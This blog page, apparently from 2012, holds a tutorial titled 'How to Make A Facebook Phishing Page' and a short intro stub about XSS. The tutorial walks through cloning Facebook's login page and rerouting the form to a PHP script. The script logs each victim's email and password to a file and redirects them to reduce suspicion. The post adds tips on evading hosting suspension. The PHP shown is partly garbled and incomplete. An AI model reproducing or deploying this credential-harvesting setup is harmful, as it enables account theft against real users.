Thursday, 2 August 2012

How to Make A Facebook Phishing Page?

How to Make A Facebook Phishing Page?

What you Should Know Already?
--  You Should Know What is Phishing
--  You must have a hosting account with PHP enabled
--  A brain to copy paste and to understand

What this Tutorial will teach you?
--  How to create a Phishing page 
--  Make the phishing page redirect when  used


I'm creating a Facebook Phish Page in this tutorial you can choose any and repeat the steps.

Goto the site you want to make phish page of, i'm making of facebook so i'm going to http// in my browser...
and it looks like this :

Now right click and click save as, and save the page in a new folder named as facebook
Now opened the save page in any text editor of your choice, my fav is Notepad++

Now Find the below text in file and replace it with the next

Find :

<form id="login_form" action="" method="post"
and replace it with :

<form id="login_form" action="./login.php" method="post"

Warning:This find and replace is only for facebook pages.

Now save it and create a new file in same drectory named as login.php and paste the following code in that file
    $f = fopen("log.html","a");
    $s="Email :".$_POST['email']."<br>Pass :".$_POST['pass']."<br>";
echo "<html><head><script>window.location = '';</script></head><body></body></html>";    
now upload all these files in folder to your host and start phishing
your user and pass will be stored at log.html file on your phishing site..
After logging the page will be redirected to, to decrease suspicion..

hope you like liked

For Hosting:
No Hosting is there who will not suspend you, but some are there which do it slowly...

and if you want a phishing page with no suspension from hosting and completely undetectable from hosting providers, wait for my next article phishing spoofing......

Tuesday, 29 November 2011

Xss (Cross Site Scripting)

here it go guys......

An introduction to xss for n00bs....

xss for cross site scripting a common low risk web application vulnerability..

and yes the demo site is not available cause my hosting account is been
i will try if i have time to rebuild the demo site......

thanks for watching...
comment if you liked....